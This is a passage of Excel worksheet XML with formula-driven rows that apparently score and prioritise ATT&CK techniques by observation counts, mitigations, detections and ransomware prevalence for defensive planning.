        <v>0</v>
      </c>
      <c r="X27" s="37">
        <v>0</v>
      </c>
      <c r="Y27" s="37">
        <v>0</v>
      </c>
      <c r="Z27" s="37">
        <v>1</v>
      </c>
      <c r="AA27" s="37">
        <v>0.01</v>
      </c>
      <c r="AB27" s="37">
        <v>0.01</v>
      </c>
      <c r="AC27" s="37"/>
      <c r="AD27" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE27" s="37" t="str" cm="1">
        <f t="array" ref="AE27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD27)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF27" s="37">
        <v>23</v>
      </c>
      <c r="AG27" s="37" t="str" cm="1">
        <f t="array" ref="AG27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD27)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH27" s="37">
        <v>23</v>
      </c>
      <c r="AI27" s="37" t="str" cm="1">
        <f t="array" ref="AI27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD27)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ27" s="37">
        <v>23</v>
      </c>
      <c r="AK27" s="37" t="str" cm="1">
        <f t="array" ref="AK27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD27)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL27" s="37">
        <v>23</v>
      </c>
      <c r="AM27" s="37" t="str" cm="1">
        <f t="array" ref="AM27">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD27)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN27" s="37">
        <v>0</v>
      </c>
      <c r="AO27" s="37"/>
      <c r="AP27" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ27" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.2476190476190481</v>
      </c>
      <c r="AR27" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS27" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT27" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU2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8" spans="1:47" ht="34">
      <c r="A28" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B28" s="37">
        <f t="shared" si="0"/>
        <v>9.7000000000000011</v>
      </c>
      <c r="C28" s="37" t="s">
        <v>3764</v>
      </c>
      <c r="D28" s="50" t="s">
        <v>155</v>
      </c>
      <c r="E28" s="37" t="s">
        <v>3765</v>
      </c>
      <c r="F28" s="37">
        <v>1</v>
      </c>
      <c r="G28" s="37">
        <v>1</v>
      </c>
      <c r="H28" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I28" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J28" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K28" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L28" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M28" s="37">
        <v>0</v>
      </c>
      <c r="N28" s="56">
        <v>0</v>
      </c>
      <c r="O28" s="56">
        <v>0</v>
      </c>
      <c r="P28" s="56">
        <v>0</v>
      </c>
      <c r="Q28" s="56">
        <v>0</v>
      </c>
      <c r="R28" s="57"/>
      <c r="S28" s="57"/>
      <c r="T28" s="57"/>
      <c r="U28" s="57"/>
      <c r="V28" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W28" s="37"/>
      <c r="X28" s="37"/>
      <c r="Y28" s="37"/>
      <c r="Z28" s="37"/>
      <c r="AA28" s="37"/>
      <c r="AB28" s="37"/>
      <c r="AC28" s="37"/>
      <c r="AD28" s="50" t="s">
        <v>3766</v>
      </c>
      <c r="AE28" s="37" t="str" cm="1">
        <f t="array" ref="AE28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD28)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF28" s="37">
        <v>24</v>
      </c>
      <c r="AG28" s="37" t="str" cm="1">
        <f t="array" ref="AG28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD28)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH28" s="37">
        <v>24</v>
      </c>
      <c r="AI28" s="37" t="str" cm="1">
        <f t="array" ref="AI28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD28)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ28" s="37">
        <v>24</v>
      </c>
      <c r="AK28" s="37" t="str" cm="1">
        <f t="array" ref="AK28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD28)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL28" s="37">
        <v>24</v>
      </c>
      <c r="AM28" s="37" t="str" cm="1">
        <f t="array" ref="AM28">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD28)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN28" s="37"/>
      <c r="AO28" s="37"/>
      <c r="AP28" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ28" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.2333333333333338</v>
      </c>
      <c r="AR28" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS28" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT28" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU2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9" spans="1:47" ht="51">
      <c r="A29" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B29" s="37">
        <f t="shared" si="0"/>
        <v>30.344680476190476</v>
      </c>
      <c r="C29" s="37" t="s">
        <v>160</v>
      </c>
      <c r="D29" s="50" t="s">
        <v>161</v>
      </c>
      <c r="E29" s="37"/>
      <c r="F29" s="37">
        <v>1</v>
      </c>
      <c r="G29" s="37">
        <v>1</v>
      </c>
      <c r="H29" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I29" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J29" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K29" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L29" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M29" s="37">
        <v>1.949E-2</v>
      </c>
      <c r="N29" s="56">
        <v>1</v>
      </c>
      <c r="O29" s="56">
        <v>15</v>
      </c>
      <c r="P29" s="56">
        <v>4</v>
      </c>
      <c r="Q29" s="56">
        <v>18</v>
      </c>
      <c r="R29" s="57"/>
      <c r="S29" s="57">
        <v>0</v>
      </c>
      <c r="T29" s="57"/>
      <c r="U29" s="57">
        <v>0</v>
      </c>
      <c r="V29" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18095238095238095</v>
      </c>
      <c r="W29" s="37">
        <v>0</v>
      </c>
      <c r="X29" s="37">
        <v>0</v>
      </c>
      <c r="Y29" s="37">
        <v>0</v>
      </c>
      <c r="Z29" s="37">
        <v>38</v>
      </c>
      <c r="AA29" s="37">
        <v>0.38</v>
      </c>
      <c r="AB29" s="37">
        <v>0.38</v>
      </c>
      <c r="AC29" s="37"/>
      <c r="AD29" s="50" t="s">
        <v>162</v>
      </c>
      <c r="AE29" s="37" t="str" cm="1">
        <f t="array" ref="AE29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD29)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF29" s="37">
        <v>25</v>
      </c>
      <c r="AG29" s="37" t="str" cm="1">
        <f t="array" ref="AG29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD29)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH29" s="37">
        <v>25</v>
      </c>
      <c r="AI29" s="37" t="str" cm="1">
        <f t="array" ref="AI29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD29)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ29" s="37">
        <v>25</v>
      </c>
      <c r="AK29" s="37" t="str" cm="1">
        <f t="array" ref="AK29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD29)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL29" s="37">
        <v>25</v>
      </c>
      <c r="AM29" s="37" t="str" cm="1">
        <f t="array" ref="AM29">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD29)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN29" s="37">
        <v>0</v>
      </c>
      <c r="AO29" s="37">
        <v>4</v>
      </c>
      <c r="AP29" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ29" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>10.114893492063493</v>
      </c>
      <c r="AR29" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS29" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT29" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU2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1.0585612849584278</v>
      </c>
    </row>
    <row r="30" spans="1:47" ht="68">
      <c r="A30" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B30" s="37">
        <f t="shared" si="0"/>
        <v>16.522259999999999</v>
      </c>
      <c r="C30" s="37" t="s">
        <v>163</v>
      </c>
      <c r="D30" s="50" t="s">
        <v>164</v>
      </c>
      <c r="E30" s="37"/>
      <c r="F30" s="37">
        <v>1</v>
      </c>
      <c r="G30" s="37">
        <v>1</v>
      </c>
      <c r="H30" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I30" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J30" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K30" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L30" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M30" s="37">
        <v>2.12E-4</v>
      </c>
      <c r="N30" s="56">
        <v>0</v>
      </c>
      <c r="O30" s="56">
        <v>5</v>
      </c>
      <c r="P30" s="56">
        <v>1</v>
      </c>
      <c r="Q30" s="56">
        <v>6</v>
      </c>
      <c r="R30" s="57"/>
      <c r="S30" s="57">
        <v>0</v>
      </c>
      <c r="T30" s="57"/>
      <c r="U30" s="57">
        <v>0</v>
      </c>
      <c r="V30" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>5.7142857142857134E-2</v>
      </c>
      <c r="W30" s="37">
        <v>0</v>
      </c>
      <c r="X30" s="37">
        <v>0</v>
      </c>
      <c r="Y30" s="37">
        <v>0</v>
      </c>
      <c r="Z30" s="37">
        <v>12</v>
      </c>
      <c r="AA30" s="37">
        <v>0.12</v>
      </c>
      <c r="AB30" s="37">
        <v>0.12</v>
      </c>
      <c r="AC30" s="37"/>
      <c r="AD30" s="50" t="s">
        <v>165</v>
      </c>
      <c r="AE30" s="37" t="str" cm="1">
        <f t="array" ref="AE30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD30)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF30" s="37">
        <v>26</v>
      </c>
      <c r="AG30" s="37" t="str" cm="1">
        <f t="array" ref="AG30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD30)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH30" s="37">
        <v>26</v>
      </c>
      <c r="AI30" s="37" t="str" cm="1">
        <f t="array" ref="AI30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD30)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ30" s="37">
        <v>26</v>
      </c>
      <c r="AK30" s="37" t="str" cm="1">
        <f t="array" ref="AK30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD30)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL30" s="37">
        <v>26</v>
      </c>
      <c r="AM30" s="37" t="str" cm="1">
        <f t="array" ref="AM30">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD30)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN30" s="37">
        <v>0</v>
      </c>
      <c r="AO30" s="37">
        <v>1</v>
      </c>
      <c r="AP30" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ30" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>5.5074199999999998</v>
      </c>
      <c r="AR30" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS30" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT30" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU3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0.15493857142857143</v>
      </c>
    </row>
    <row r="31" spans="1:47" ht="34">
      <c r="A31" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B31" s="37">
        <f t="shared" si="0"/>
        <v>31.142883095238098</v>
      </c>
      <c r="C31" s="37" t="s">
        <v>166</v>
      </c>
      <c r="D31" s="50" t="s">
        <v>164</v>
      </c>
      <c r="E31" s="37" t="s">
        <v>167</v>
      </c>
      <c r="F31" s="37">
        <v>1</v>
      </c>
      <c r="G31" s="37">
        <v>1</v>
      </c>
      <c r="H31" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I31" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J31" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K31" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L31" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M31" s="37">
        <v>0</v>
      </c>
      <c r="N31" s="56">
        <v>0</v>
      </c>
      <c r="O31" s="56">
        <v>0</v>
      </c>
      <c r="P31" s="56">
        <v>0</v>
      </c>
      <c r="Q31" s="56">
        <v>1</v>
      </c>
      <c r="R31" s="57" t="s">
        <v>168</v>
      </c>
      <c r="S31" s="57">
        <v>3</v>
      </c>
      <c r="T31" s="57" t="s">
        <v>169</v>
      </c>
      <c r="U31" s="57">
        <v>16</v>
      </c>
      <c r="V31" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18571452380952383</v>
      </c>
      <c r="W31" s="37">
        <v>19</v>
      </c>
      <c r="X31" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y31" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z31" s="37">
        <v>1</v>
      </c>
      <c r="AA31" s="37">
        <v>0.01</v>
      </c>
      <c r="AB31" s="37">
        <v>0.01</v>
      </c>
      <c r="AC31" s="37"/>
      <c r="AD31" s="50" t="s">
        <v>136</v>
      </c>
      <c r="AE31" s="37" t="str" cm="1">
        <f t="array" ref="AE31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD31)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF31" s="37">
        <v>27</v>
      </c>
      <c r="AG31" s="37" t="str" cm="1">
        <f t="array" ref="AG31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD31)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH31" s="37">
        <v>27</v>
      </c>
      <c r="AI31" s="37" t="str" cm="1">
        <f t="array" ref="AI31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD31)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ31" s="37">
        <v>27</v>
      </c>
      <c r="AK31" s="37" t="str" cm="1">
        <f t="array" ref="AK31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD31)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL31" s="37">
        <v>27</v>
      </c>
      <c r="AM31" s="37" t="str" cm="1">
        <f t="array" ref="AM31">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD31)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN31" s="37">
        <v>0</v>
      </c>
      <c r="AO31" s="37">
        <v>0</v>
      </c>
      <c r="AP31" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ31" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>10.380961031746033</v>
      </c>
      <c r="AR31" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS31" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT31" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU3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2" spans="1:47" ht="85">
      <c r="A32" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B32" s="37">
        <f t="shared" si="0"/>
        <v>179.92342671428571</v>
      </c>
      <c r="C32" s="37" t="s">
        <v>170</v>
      </c>
      <c r="D32" s="50" t="s">
        <v>171</v>
      </c>
      <c r="E32" s="37"/>
      <c r="F32" s="37">
        <v>4</v>
      </c>
      <c r="G32" s="37">
        <v>5</v>
      </c>
      <c r="H32" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.45</v>
      </c>
      <c r="I32" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J32" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K32" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L32" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M32" s="37">
        <v>0.66605199999999998</v>
      </c>
      <c r="N32" s="56">
        <v>1</v>
      </c>
      <c r="O32" s="56">
        <v>3</v>
      </c>
      <c r="P32" s="56">
        <v>34</v>
      </c>
      <c r="Q32" s="56">
        <v>24</v>
      </c>
      <c r="R32" s="57" t="s">
        <v>172</v>
      </c>
      <c r="S32" s="57">
        <v>7</v>
      </c>
      <c r="T32" s="57" t="s">
        <v>173</v>
      </c>
      <c r="U32" s="57">
        <v>12</v>
      </c>
      <c r="V32" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.4761907142857143</v>
      </c>
      <c r="W32" s="37">
        <v>19</v>
      </c>
      <c r="X32" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y32" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z32" s="37">
        <v>62</v>
      </c>
      <c r="AA32" s="37">
        <v>0.62</v>
      </c>
      <c r="AB32" s="37">
        <v>0.62</v>
      </c>
      <c r="AC32" s="37"/>
      <c r="AD32" s="50" t="s">
        <v>174</v>
      </c>
      <c r="AE32" s="37" t="str" cm="1">
        <f t="array" ref="AE32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD32)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF32" s="37">
        <v>28</v>
      </c>
      <c r="AG32" s="37" t="str" cm="1">
        <f t="array" ref="AG32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD32)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH32" s="37">
        <v>28</v>
      </c>
      <c r="AI32" s="37" t="str" cm="1">
        <f t="array" ref="AI32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD32)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ32" s="37">
        <v>28</v>
      </c>
      <c r="AK32" s="37" t="str" cm="1">
        <f t="array" ref="AK32">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD32)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL32" s="37">
        <v>28</v>
      </c>
      <c r="AM32" s="37" t="str" cm="1">
